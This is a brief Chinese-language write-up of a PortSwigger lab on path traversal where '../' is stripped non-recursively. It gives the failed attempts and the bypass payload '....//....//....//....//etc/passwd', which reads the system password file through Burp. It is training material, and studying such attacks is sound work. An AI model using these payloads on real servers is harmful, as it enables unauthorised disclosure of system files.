burpsuite靶场----目录遍历----复写绕过
burpsuite靶场----目录遍历----复写绕过
靶场地址
https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively
正式开始
1.查看图片
2.测试./../../../etc/passwd
和/etc/passwd
都失败了
猜测是过滤了'../'采用复写绕过
....//....//....//....//etc/passwd
3.在bp里可以读到